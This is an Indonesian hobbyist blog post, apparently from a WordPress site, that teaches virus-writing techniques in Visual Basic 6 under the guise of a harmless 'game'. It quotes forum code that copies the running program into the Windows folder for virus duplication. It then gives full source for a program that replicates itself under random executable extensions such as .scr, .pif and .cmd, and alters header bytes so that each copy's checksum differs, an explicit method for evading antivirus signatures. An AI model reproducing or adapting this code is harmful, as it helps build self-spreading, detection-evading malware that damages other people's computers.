Hacking/Cracking : The Blup-Blup Game

Hacking/Cracking : The Blup-Blup Game

Bermain dengan Program yg Imutz Abiz

Prologue

Jika kita adalah pohon, lalu pohon apakah kita ? Kita menjadi pohon yang berguna, pohon yang baik adalah pohon yang akarnya jauh menghujam ke tanah, batangnya kokoh maka daunnya yang rindang adalah tempat berteduh dan pula buah-nya manis. Sehingga dapat memberi manfaat untuk sekitarnya.
Halah apa hubungannya……

History

4000 tahun cahaya yang lampau, di jagat nun jauh semesta alam sana pula dimensi yang lain. tempat para virologger n virus maker bercokol yaitu yang bernama planeta Virologi.Info tepatnya yaitu pada 2008/7/11 12:30, seekor alien bernama Morphic memberikan komentar pada sebuah posting berjudul “Menduplikasi diri Sendiri dan file lain” yang diposting oleh seekor anak alien yang lain yaitu SENA`P. CAHYA. Berkatalah ia (morphic).

————————————————————————————————
Morphic
Posted: 2008/7/11 12:30 Updated: 2008/7/11 12:30

Re: Menduplikasi diri Sendiri dan file lain by SENA`P. CAHYA
kalo mau menduplikasi atau mengcopy file boleh dengan cara yang diatas.
Tapi kalo diteliti lebih dalam, nilai checksum crc32 aplikasi sendiri dan aplikasi duplikat adalah sama. (kalo code di atas pengen kita jadikan bahan duplikat virus ya. Kalo gak ya udah…)

pakai code (untuk duplikasi virus yang baik)
‘crc32 boleh beda tapi md5 tetap sama (belum aku coba sihh

private sub form_load()
dim arr() as byte
open app.path & “\” & app.exename & “.exe” for binary as #1
redim arr(0 to LOF(1)-1)
get #1,, arr()
close #1
open environ$(“windir) & “\tujuan.exe” for binary as #1
put #1,, arr()
close #1
end sub

kalo gak salah ya, code-nya seperti di atas
sori kalo salah soalnya agak rada lupa

caci maki ke:
http://www.morphic.co.nr/
————————————————————————————————

Morphic, ketika itu ia sedang bertapa dan mohon petunjuk maka ketika itupun tak berapa lama kemudian dewa menghampiri, Sang Prasetyo turun dari khayangan disertai para bidadari yang cantik n molek (kecantikan yang menggoyahkan iman) dan berkatalah ia dalam syair begini: “Gantilah operator – (minus) dengan + (plus) dan tambahkan tanda kutip setelah windir !”.

‘nah ini yang bener

private sub form_load()
dim arr() as byte
open app.path & “\” & app.exename & “.exe” for binary as #1
redim arr(0 to LOF(1) +1)
get #1,, arr()
close #1
open environ$(“windir”) & “\tujuan.exe” for binary as #1
put #1,, arr()
close #1
end sub

Demikianlah yang benar dan cobalah jika kamu ingin mencoba !

Phenomenon

Setelah di praktekan di rumah saya coba dengan WedashAV, apakah crc32 berbeda ? Dan ternyata memang demikian. Selidik punya selidik ternyata yang menyebabkan perubahan nilai crc32 pada duplikat program itu adalah karena pertambahan dua byte pada bagian paling akhir dari program, yaitu byte 0D dan 0A atau kalau diterjemahkan yaitu adalah tanda pergantian baris atau dengan kata lain adalah enter (Huu.. sok tau loeee…).

Ini saya lihat dengan hex editor (dengan mata kepala sendiri lho… !).

Fenomena aneh ini disebabkan oleh format variabel Visual Basic (yang kagak dideklarasikan). Ooo.. itu to yang menyebabkan crc32-nya berbeda dengan induknya adalah karena pertambahan dua byte. Mengingat apabila setiap penggandaan file virus bertambah 2 byte ya repot dong mas.. Ini gemana seh… ¿ (Morphic ¿)

Gene maksudnya apabila sebuah file virus yang menggunakan kode replikasi di atas adalah hasil replikasi ke-4389 (anggap udah infek komputer se-Indonesia) maka artinya, SizeRepN = SizeAwal + ( 2 * nRep ) ini berarti jika size awalnya adalah 24 Kb maka size akhir replikasi atau penggandaan yang ke-4389 adalah 24000byte + ( 2 * 4389 ) = 32778 byte atau hampir 33Kb udah nambah 9Kb tuh, tapi bagaimana sizenya kalau sudah sampai ke Jepang dan akan beberapa ratus kali lipatnya lagi kalau sudah di Amerika !!! Nilai pasti tidak terbayangkan dan hal ini tidaklah efisien khan !

Perbandingan (z = x : y)

Jikalau dibandingkan dengan virus yang menyebar belakangan ini maka untuk mengubah nilai crc32-nya, virus itu memodifikasi header hasil replikasi-nya.
Saya coba rekonstruksi virus yang menggunakan teknik modifikasi header file (rekonstruksi source code: ikut-ikutan gaya Yohanes Nugraha, si pembredel isi brontok generasi pertama :vb, kedua :vc dan yang ketiga tanya si alien HVM31 !) teknik ini saya coba di rumah sampai berulang-ulang (try and error) gagal-gagal terus ini penyebabnya.

Sebabnya sama yaitu disebabkan oleh format variabel Visual Basic (yang kagak dideklarasikan).
Namun setelah keberapa belas kalinya, saya akhirnya berhasil juga.
Ini yang berhasil.

Program hasil replikasi dengan modifikasi headernya akhirnya pun berhasil dan program itu induk maupun hasil replikasi dapat berjalan tanpa error sedikitpun. Shempurna.
Saya Coba dengan WedashAV crc32-nya berbeda dan ukurannya tetap sama untuk tiap-tiap domba yang tersesat (eh.. maksud saya untuk tiap-tiap file hasil replikasi). Ci..huy…
Akhir cerita, rekonstruksi source code virus yang memodifikasi header file-nya pun berhasil tapi ini bukanlah akhir dari segala akhir namun adalah sesuatu permulaan yang baik untuk menuju masa depan yang …..

The Blup-Blup Game

Wahai domba-dombaku, domba di padang gembalaanku ! Ehm.. terlalu bersemangat neh.
Blup-blup adalah sebuah program game kecil yang imutz abiz !
Apabila Blup-Blup.exe diklik maka akan mereplikasikan dirinya dengan nama lain dengan tetap pada folder yang sama dengan nama file misalnya: 1408200201122.pif, nama beserta ekstensinya akan berbeda-beda dengan tergantung pada digit terakhir microsecond yang antara 0 s.d 9. Bisa saja *.scr, *.exe, *.cmd dan sebagainya. Klik file hasil replikasi-nya dan akan mereplikasikan diri lagi. Setiap file hasil replikasi akan memiliki crc32 yang berbeda dengan ukuran file yang sama.

Cobalah kamu tebak nama blup-blup yang akan muncul beserta ekstensi-nya apa ? sekaligus apa bentuk iconnya ? Dan nilai crc32-nya ?
Untuk menjawab pertanyaan yang terakhir boleh ambil checksume crc32-nya pakai WedashAV atau yang lain.

Bedah Program

Buka VB  Standard EXE dan pada project explorer tepat pada form1, klik kanan n remove. Buat sebuah modul pada VB dengan cara memasuki menu Project  Add Module dan copy pastekan kode berikut:

‘————–

‘ Prasetyo Priadi
‘ 2009 Prasetyo Labs. General Public License.
‘ Site : http://www.prasetyolabs.co.cc/

Private Sub Main()

On Error Resume Next

Dim eks, S, B As String

t = Now ‘t = Ambil waktu
y = Mid(t, 18, 1) ‘y = Ambil digit terakhir microsecond (0 s.d 9)

Select Case y
Case “0”
eks = “.exe”
Case “1”
eks = “.scr”
Case “2”
eks = “.pif”
Case “3”
eks = “.bat”
Case “4”
eks = “.cmd”
Case “5”
eks = “.com”
Case “6”
eks = “.pif”
Case “7”
eks = “.scr”
Case “8”
eks = “.exe”
Case “9”
eks = “.cmd”
End Select

B = App.Path & “\” & NamaFile & eks

K = Karakter

FileCopy App.Path & “\” & App.EXEName & “.exe”, B
FileCopy App.Path & “\” & App.EXEName & “.scr”, B
FileCopy App.Path & “\” & App.EXEName & “.pif”, B
FileCopy App.Path & “\” & App.EXEName & “.bat”, B
FileCopy App.Path & “\” & App.EXEName & “.cmd”, B
FileCopy App.Path & “\” & App.EXEName & “.com”, B

Open B For Binary As #1
Put #1, , “MZ” & Asc(Chr(K))
Close #1

End Sub

Function Karakter() As String
‘Angka random 1 s.d 198 yang tergantung pada waktu
‘Logika random dapat diubah asal angka yang diha-
‘silkan adalah 1 s.d 255 tak boleh lebih atau kurang
‘Setelah itu ambil karakter dari nilai random tsb
‘Kelemahan = Belum optimal karena nilai max = 198
‘Jadi variasi crc tau signed (penanda) ya segetu atau
‘cuma 198 buah belum 255
‘Sory yak but keburu napsu neh

t = Now ‘t = Ambil waktu
y = Mid(t, 17, 2) ‘y = Ambil digit terakhir microsecond (0 s.d 9)
i = Rnd(y) ‘i = Acak dari y
e = y
For r = 1 To e
t = Now ‘t = Ambil waktu
y = Mid(t, 18, 1) ‘y = Ambil digit terakhir microsecond (0 s.d 9)
i = Rnd(y) ‘i = Acak dari y
x = Mid(i, 4, 1) ‘x = Ambil dari karakter 4 sebanyak satu digit
j = Rnd(x) ‘j = Nilai acak dari x Acak
Next

‘Karakter = nilai j karakter ke empat
‘sebanyak dua digit ditambah nilai i
‘karakter ke tiga sebanyak dua digit
‘Terlalu rumit yak ? He.. he… he…
Karakter = Val(Mid(j, 4, 2)) + Val(Mid(i, 3, 2))
End Function

Function NamaFile() As String
d = Now
d = Replace(d, “/”, “”, 1, 2)
d = Replace(d, “:”, “”, 1, 2)
d = Replace(d, ” “, “”, 1, 2)
NamaFile = d
End Function

‘————–

Tentang boycreations

I am a boy who wont to make a many creations for share to everyone. Because i am a good boy...(^_^)
Pos ini dipublikasikan di Hacking/Cracking. Tandai permalink.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s